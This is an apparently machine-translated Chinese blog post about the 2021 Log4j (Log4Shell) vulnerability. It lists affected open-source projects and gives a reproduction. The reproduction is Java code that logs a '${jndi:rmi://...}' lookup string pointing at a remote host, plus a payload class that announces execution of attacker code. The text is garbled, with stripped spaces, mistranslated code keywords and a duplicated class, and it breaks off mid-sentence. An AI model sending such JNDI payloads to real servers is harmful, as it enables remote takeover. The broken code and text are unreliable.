2021.12.920:54,Log4j爆破“核弹级”漏洞。该漏洞利用成本极低,可直接执行任意代码并接管目标服务器。潜在危害的严重程度和影响是今年最高的。截至目前,Log4j2“核弹级”漏洞已影响全球超过6万个开源软件和超过30万个开源软件包,影响TOP10热门开源软件:Elasticsearch、SpringFramework、Druid、SpringCloudAlibaba、Skywalking、哨兵、MyBatis、HikariCP、Zipkin、MyBatis-Plus。该漏洞不排除其他利用方式,后续等待官方补丁。漏洞复现有两种方式:一种是ldap,一种是jndi;暂时通过jndi复现,感兴趣的朋友可以试试测试类importorg.apache.logging.log4j.LogManager;importorg.apache。logging.log4j.Logger;/***@Description:*@Author:王大凯*@Date:2021/12/13*/publicclassLog4jBugTest{privatestaticfinalLoggerLOGGER=LogManager.getLogger(Log4jBugTest.class);publicstaticvoidmain(String[]args){//将前端传给你的参数从jndi中添加进去,此时你已经打印了他的参数。字符串参数="${jndi:rmi://192.168.79.149:1099/bug}";LOGGER.error("参数:{}",params);}}远程服务器,这里用自己本地的ip,端口不要改。packagecom.cn.zj;importorg.apache.logging.log4j.LogManager;importorg.apache.logging.log4j.Logger;/***@Description:*@Author:wangdakai*@Date:2021/12/13*/publicclassLog4jBugTest{privatestaticfinalLoggerLOGGER=LogManager.getLogger(Log4jBugTest.class);publicstaticvoidmain(String[]args){//前端传给你的参数是jndi,你打印他的参数。字符串参数="${jndi:rmi://192.168.79.149:1099/bug}";LOGGER.error("参数:{}",params);}}共执行此代码包com.cn.zj;/***@Description:*@Author:wangdakai*@Date:2021/12/13*/publicclassBug{static{System.out.println("执行攻击者的代码");}}maven依赖于
